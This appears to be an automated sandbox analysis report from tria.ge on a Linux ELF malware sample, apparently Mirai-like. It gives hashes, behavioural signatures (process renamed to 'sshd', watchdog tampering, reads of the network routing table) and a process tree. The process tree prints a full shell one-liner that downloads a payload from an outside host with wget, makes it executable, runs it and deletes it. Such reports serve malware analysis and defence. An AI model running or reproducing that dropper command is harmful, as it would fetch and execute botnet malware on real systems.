Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
142s -
max time network
143s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240221-en -
resource tags
arch:amd64arch:i386image:ubuntu1804-amd64-20240221-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system -
submitted
22/02/2024, 21:46
Behavioral task
behavioral1
Sample
ed53374c74224ead232e63bbe7fa7242.elf
Resource
ubuntu1804-amd64-20240221-en
General
-
Target
ed53374c74224ead232e63bbe7fa7242.elf
-
Size
114KB
-
MD5
ed53374c74224ead232e63bbe7fa7242
-
SHA1
e1ffd571459085cc2bd4c7ea2bc5916d408a9be3
-
SHA256
918e9149b7bccfc9c8e9a22548e5953f249ac72bbf552af7774a41273a431d28
-
SHA512
82d75789a09b5518ba22c8b79b9719c7933e6f1c6660259bbe4fb220af761e3f151f35148cfa25adf1f7b067c4e3f836cbfdb9ee69257b1c0d4e016f25f7f3a0
-
SSDEEP
3072:uirMUYZMo/QJLRZDsqtxqLX5I/uJiouf2yd1m7FnVqfJXoebNb:SKo/O8qtUbKVbm7FnVqfJXoebNb
Malware Config
Signatures
-
Changes its process name 1 IoCs
description ioc pid Process Changes the process name, possibly in an attempt to hide itself sshd 1581 ed53374c74224ead232e63bbe7fa7242.elf -
Executes dropped EXE 1 IoCs
ioc pid Process /tmp/..... 1591 ..... -
Modifies Watchdog functionality 1 TTPs 2 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
description ioc File opened for modification /dev/watchdog File opened for modification /dev/misc/watchdog -
Reads system routing table 1 TTPs 1 IoCs
Gets active network interfaces from /proc virtual filesystem.
description ioc Process File opened for reading /proc/net/route ed53374c74224ead232e63bbe7fa7242.elf -
Reads system network configuration 1 TTPs 1 IoCs
Uses contents of /proc filesystem to enumerate network settings.
description ioc Process File opened for reading /proc/net/route ed53374c74224ead232e63bbe7fa7242.elf -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/..... wget
Processes
-
/tmp/ed53374c74224ead232e63bbe7fa7242.elf/tmp/ed53374c74224ead232e63bbe7fa7242.elf1⤵
- Changes its process name
- Reads system routing table
- Reads system network configuration
PID:1581
-
/bin/sh/bin/sh -c "wget -q http://gay.energy/.../vivid -O .....;chmod 777 .....;./.....;rm -rf ....."1⤵PID:1582
-
/usr/bin/wgetwget -q http://gay.energy/.../vivid -O .....2⤵
- Writes file to tmp directory
PID:1586
-
-
/bin/chmodchmod 777 .....2⤵PID:1590
-
-
/tmp/....../.....2⤵
- Executes dropped EXE
PID:1591
-
-
/bin/sh/bin/sh ./.....2⤵PID:1591
-
-
/bin/rmrm -rf .....2⤵PID:1593
-